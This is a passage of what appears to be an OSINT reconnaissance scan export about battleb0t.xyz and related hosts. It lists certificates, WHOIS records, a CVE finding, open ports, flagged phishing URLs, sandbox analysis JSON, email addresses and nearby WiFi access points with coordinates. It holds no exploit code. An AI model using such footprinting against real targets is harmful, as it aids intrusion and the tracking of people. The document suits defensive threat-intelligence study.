"OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} | 46.101.229.70 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 19:07:08.083 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D0:FF:78:AE:C3:62:89:90:F2:A9:F6:
CF:41:A5:B6:AB:51:6D:6E:FB:5E:D8:9D:88:9E:50:39:
26:BD:EC:AC:34:02:21:00:BC:89:FB:E2:F1:35:F7:00:
0B:4C:4C:DE:C4:12:88:E0:4F:52:7D:18:21:0D:AC:62:
BC:76:DD:A2:F8:3F:5B:1D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 13 19:07:08.583 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:51:94:B0:CF:3C:86:38:A4:D9:80:6F:E3:
EC:3D:37:CB:B4:65:E2:35:17:5E:BA:96:76:F4:A6:90:
1D:6A:AE:4B:02:21:00:9D:89:ED:FC:FA:3F:52:5C:6A:
FF:DA:D2:C4:54:F3:CB:81:7B:1B:4B:4F:01:26:9F:C1:
04:B7:D6:CE:B9:77:B8
Signature Algorithm: sha256WithRSAEncryption
91:4e:e2:bf:36:57:41:de:a3:6f:91:fb:a2:73:ec:c8:9e:f7:
1f:0d:59:7b:c6:09:e3:fb:bf:a4:c2:8a:32:fa:c4:f6:df:3f:
aa:05:e0:24:98:16:08:84:62:26:41:b9:6f:39:f4:71:d6:ee:
5c:b1:36:f4:e8:21:c1:33:ce:b6:3c:af:4d:e7:18:2f:6c:27:
6e:cd:40:66:5d:d7:bd:71:74:93:04:96:39:63:25:d2:be:99:
3b:37:81:f8:a4:eb:0b:81:a4:3b:25:e3:9f:76:85:e0:0f:1a:
92:b6:27:46:71:61:51:3a:f7:5d:72:65:00:9d:09:05:5c:de:
c1:d4:54:d5:5a:d7:d7:34:d4:2c:67:0d:f8:a4:f0:c4:3a:47:
80:3c:8b:81:06:a8:34:d6:42:45:55:c8:42:f9:cf:43:4d:ee:
bd:e9:55:d7:d8:77:a3:d9:4c:76:08:4a:3c:a8:97:42:30:c9:
07:48:ea:bf:5e:b8:93:d2:56:00:0f:04:1c:00:01:69:ac:de:
20:d1:8a:7a:88:01:7c:94:e0:3d:d3:30:5e:a9:3c:d3:38:56:
5b:30:14:08:f5:b9:a1:f9:56:6c:72:be:02:ce:ad:d8:53:46:
35:20:ba:70:c5:77:bf:fa:4e:08:fb:a6:cd:30:77:f4:dc:52:
90:b6:5b:91
|
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ply.gg | 185.199.109.153 |
| 2023-05-12 02:59:53 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | nwapi2.battleb0t.xyz |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jdenig@generalatlantic.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://generalatlantic.com/astehnkuhl@generalatlantic.com%20https://site.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fastehnkuhl%40generalatlantic.com%20https%3A%2F%2Fllink.to%2F%3Fu%3Dhttps%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fjdenig%40generalatlantic.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3f4_IE_EarlyTabStart_0xe18_Mutex"\n "IsoScope_3f4_IESQMMUTEX_0_331"\n "IsoScope_3f4_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3f4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "IsoScope_3f4_ConnHashTable<1012>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.43.150:443"\n "104.21.16.120:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." (Indicator: "twitter")\n "<a href="https://plus.google.com/107971784894043504000/" onclick="window.open(this.href);return false;"><i class="fa fa-google-plus"></i></a>" (Indicator: "plus.google.com")\n "<a href="https://twitter.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-twitter"></i></a>" (Indicator: "twitter")\n "<a href="https://www.facebook.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a href="https://www.linkedin.com/company/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-linkedin"></i></a>" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/user/nexcessnet" onclick="window.open(this.href);return false;"><i class="fa fa-youtube"></i></a>" (Indicator: "youtube")\n "<p>Congrats on launching your new Website! Spread the good news: <a href="https://twitter.com/share" class="twitter-share-button" data-text="Just launched my new website with @Nexcess!" data-count="none">Tweet</a></p>" (Indicator: "twitter")\n "<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script>" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar102F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1041.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab102E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1040.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "GJU2ZIBE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GJU2ZIBE.txt]- [targetUID: 00000000-00001012]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002472]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF50FE3D0FF9FC6B92.TMP" has type "data"- Location: [%TEMP%\\~DF50FE3D0FF9FC6B92.TMP]- [targetUID: 00000000-00001012]\n "_5CF2F181-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._52546023-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "site_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "FTU5WTPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FTU5WTPF.txt]- [targetUID: 00000000-00001012]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "llink_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_A79A7ACA-C1A9-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "5EL6UQQZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5EL6UQQZ.txt]- [targetUID: 00000000-00002472]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"!1,w)})},u).prototype.cr=function(){},u.prototype.xy=function(){this.mx.g().focus()},u.prototype.tt=function(w,z,u,r,e,z,y){return(r=((z=new a_((e=["api","payload",(u=void 0===u?"":u,y=["p",0,37],2)],f)[29](y[2],e[y[1]],e[1])+u),z.u).set(y[0],w),wx.y()).get(),z.u.set("k",v[7](16,e[2],r)),z&&z.u.set("id",z),z).tostring()},u).prototype.h1=function(){},u.prototype.ia=function(w,z){(((this.su[(z=["qu",30,"sq"],z)[0]](w),this).mx[z[0]](w),this).rr[z[0]](w),this)[z[2]][z[0]](w),this.bi[z[0]](w),v[z[1]](9," [Source: recaptcha__en_1_.js]\n Observed email domain:"z,u){(this[(((((td.prototype.sw[z=["undo-button-holder","image-button-holder","verify-button-holder"],u=["call",1,"sq"],u[0]](this,w),this.su).render(c[41](68,this,"reload-button-holder")),this.mx.render(c[41](52,this,"audio-button-holder")),this.rr).render(c[41](53,this,z[u[1]])),this.bi).render(c[41](84,this,"help-button-holder")),this.xv).render(c[41](68,this,z[0])),f[13](8,!1,this.xv.g()),u)[2]].render(c[41](68,this,z[2])),this).ee?f[13](22,!1,this.mx.g()):f[13](20,!1,this.rr.g())},u).prototype.nu=" [S |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.195): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:54 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2a06:98c1:3121::1 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NAMECHEAP INC | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0067ed.github.io]
https://www.openphish.com/feed.txt | 0067ed.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 20654 (Net ID: 00:0D:3A:27:40:51) | 39.0469, -77.4903 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_1.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=login | login |
| 2023-05-12 02:44:21 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 02:52:56 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | kekw.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FRANZ (Net ID: 00:01:24:F2:7F:35) | 37.7642, -122.3993 |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Germany | domixo-hosting.de |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet24CE (Net ID: 00:01:36:59:24:CC) | 37.780462,-122.390564 |
| 2023-05-12 02:45:30 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 35.229.48.116 |
| 2023-05-12 02:55:15 | Netblock Membership | No | Censys | 3 | 0 | 3 | 0 | None | 165.232.112.0/20 | 165.232.113.85 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00feng00.github.io | 185.199.111.153 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.5): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:8080 | 188.114.97.0/24 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | keyubu.net |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/Battleb0t | Battleb0t |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:80 | 188.114.96.0/24 |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.110): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:51 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06G1NS24K8856E7B6C2JF02
Date: <REDACTED>
Content-Length: 0
| 34.74.170.74 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | cloudwaysapps.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | wilson (Net ID: 00:02:2D:08:06:B3) | 37.780462,-122.390564 |
| 2023-05-12 02:50:30 | Physical Address | No | GLEIF | 0 | 0 | 3 | 0 | None | C/O CORPORATION SERVICE COMPANY, 251 LITTLE FALLS DRIVE, WILMINGTON, US-DE, US, 19808 | GoDaddy.com, LLC |
| 2023-05-12 03:00:01 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@yeulpay.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 33, u'threat_score': 50, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://yeulpay.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5812:120:WilError_01"\n 